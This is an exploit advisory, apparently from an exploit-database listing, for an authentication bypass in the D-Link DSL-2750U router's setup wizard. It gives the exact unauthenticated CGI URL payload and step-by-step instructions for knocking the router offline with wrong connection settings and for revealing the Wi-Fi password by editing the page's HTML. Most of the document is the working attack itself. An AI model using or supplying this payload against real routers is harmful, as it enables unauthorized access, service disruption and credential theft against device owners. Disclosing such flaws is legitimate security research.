○ • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • ○
• ██╗ ██╗███████╗ █████╗ ██████╗ ██████╗ •
• ██║ ██║╚══███╔╝██╔══██╗██╔══██╗██╔══██╗ •
• ██║ ██║ ███╔╝ ███████║██████╔╝██║ ██║ •
• ██║ ██║ ███╔╝ ██╔══██║██╔══██╗██║ ██║ •
• ███████╗██║███████╗██║ ██║██║ ██║██████╔╝ •
• ╚══════╝╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ •
• # Exploit Title: Setup Wizard Page Authentication Bypass {Denial Of Service & Information Leakage} •
• # Exploit Author: Admin_JOKER •
• # Email: Joker.Ktm314@gmail.com •
• # Date: 2018-08-23 •
• # Category: Webapps •
• # Vendor Homepage:https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/ •
• # Tesed on: DSL-2750U •
• # Firmware Version: 1.11 / Work All Older Firmware •
• # Video : https://youtu.be/BQQbp2vn_wY •
○ • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • ○
URL: http://[Router IP]/
Example URL : http://192.168.1.1
Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard
Example Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard
+-----------------------------------------------Setup Wizard Pages-----------------------------------------------------+
|Step 1: Set Time and Date (No matter) |
|Step 2: Setup Internet Connection (Give wrong information >> Denial of Service) |
|Step 3: Configure Wireless Network (Change Type="password" to Type="text" in html code >> Information Leakage) |
|Step 4: Set Password (Skip this Step ) |
|Step 5: Completed and Quit (Finish) |
+----------------------------------------------------------------------------------------------------------------------+